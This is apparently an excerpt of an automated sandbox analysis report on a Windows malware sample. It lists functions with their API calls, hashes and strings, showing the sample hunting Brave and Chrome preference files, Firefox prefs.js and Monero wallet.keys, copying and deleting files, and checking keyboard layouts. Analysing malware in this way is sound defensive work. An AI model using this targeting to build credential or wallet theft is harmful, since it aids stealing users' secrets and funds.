                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction ID: d648c5f8a59ba8177503ff8557441d64b1b8b7e1567aa5f704a6e06a9f992579
                                • Opcode Fuzzy Hash: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction Fuzzy Hash: 054245729001085BCB18FB70DD56EED73BDEF44300F44556AF90AB6281EE359B4ACB92
                                Function 00ED4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                • StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction ID: 9734229a052d8aaf151efa658316acde7dc0cb62b3e78b5783cd95bc4124d8ef
                                • Opcode Fuzzy Hash: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction Fuzzy Hash: 016165B1900218ABCB35EBA0EC45FEA73BCFF58301F048599B509A6145EB71DB85CF91
                                Function 00ED4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                • wsprintfA.USER32 ref: 00ED45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                • StrCmpCA.SHLWAPI(?,00EE0FC4), ref: 00ED45EB
                                • StrCmpCA.SHLWAPI(?,00EE0FC8), ref: 00ED4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED468B
                                • FindClose.KERNEL32(000000FF), ref: 00ED46A0
                                • lstrcat.KERNEL32(?,01B8E360), ref: 00ED46C5
                                • lstrcat.KERNEL32(?,01B8D378), ref: 00ED46D8
                                • lstrlen.KERNEL32(?), ref: 00ED46E5
                                • lstrlen.KERNEL32(?), ref: 00ED46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction ID: 6a47af1b0982da7e60de7ab711326ecdbbb2d2cdfe70f0620c11e4b58d58c233
                                • Opcode Fuzzy Hash: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction Fuzzy Hash: DE5162B69003189BC725EB70EC89FE9737CEF58300F405599B61AA2184EBB59BC5CF91
                                Function 00ED3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED3EDA
                                • StrCmpCA.SHLWAPI(?,00EE0FAC), ref: 00ED3F08
                                • StrCmpCA.SHLWAPI(?,00EE0FB0), ref: 00ED3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED406C
                                • FindClose.KERNEL32(000000FF), ref: 00ED4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction ID: 0e78bac920c929196d840b64c1d3d9e4beb4a2955d4e7746184db4b5081b108e
                                • Opcode Fuzzy Hash: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction Fuzzy Hash: BC5176B6900318ABCB25EBB0DC45EEA73BCFF48300F005599B659A2140DBB5DB86CF51
                                Function 00ECED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ECED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ECED55
                                • StrCmpCA.SHLWAPI(?,00EE1538), ref: 00ECEDAB
                                • StrCmpCA.SHLWAPI(?,00EE153C), ref: 00ECEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00ECF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction ID: a0743fd4dc46d0b47ddf9163b7f4efc57e77b04865a998cc490efd27e83e5b86
                                • Opcode Fuzzy Hash: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction Fuzzy Hash: 75E130769112589ADB18EB20DC96EEE7378EF54300F4451BAB40A72152EE306F8BDF51
                                Function 00ECF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction ID: 65236e63a33b0e2d27d793cf8d4d25fe38795ec1eaff8c7870f8758367641d1e
                                • Opcode Fuzzy Hash: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction Fuzzy Hash: 1FB135769002589BCB28EF60DD55FED73B9EF54300F4491BAE80AA7241EF315B4ACB91
                                Function 00EC16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE510C,?,?,?,00EE51B4,?,?,00000000,?,00000000), ref: 00EC1923
                                • StrCmpCA.SHLWAPI(?,00EE525C), ref: 00EC1973
                                • StrCmpCA.SHLWAPI(?,00EE5304), ref: 00EC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00EC1E32
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction ID: c9096b47d3783d2bc713f90d7ea694eec2d372e3cf2feff0611045fd92179127
                                • Opcode Fuzzy Hash: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction Fuzzy Hash: 181231769101589ACB19EB60DC96EED73B8EF54300F4461BAB50A72191EF306F8BCF91
                                Function 00ECDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EE0C2E), ref: 00ECDE5E
                                • StrCmpCA.SHLWAPI(?,00EE14C8), ref: 00ECDEAE
                                • StrCmpCA.SHLWAPI(?,00EE14CC), ref: 00ECDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00ECE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction ID: 3748cfaf016f3ca76f32540edd51a3262a1b10dd1350c7492f4a25cbde6fd077
                                • Opcode Fuzzy Hash: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction Fuzzy Hash: 52F11F768101589ACB19EB60DC95EEE7378FF54300F8461FAA41A72191EF306B8BDF51
                                Function 00ECDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE14B0,00EE0C2A), ref: 00ECDAEB
                                • StrCmpCA.SHLWAPI(?,00EE14B4), ref: 00ECDB33
                                • StrCmpCA.SHLWAPI(?,00EE14B8), ref: 00ECDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00ECDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction ID: 99e495fc0f6de208d5765e73f6499cfcd9b07fe5bb3a0e766d9373c40cd950b4
                                • Opcode Fuzzy Hash: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction Fuzzy Hash: 0691457290020457CB14FF70ED56EED73BDEF84300F44967AB81AB6241EE759B4A8B92
                                Function 00ED7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EE05AF), ref: 00ED7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00ED7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00ED7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00ED7C62
                                • LocalFree.KERNEL32(00000000), ref: 00ED7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
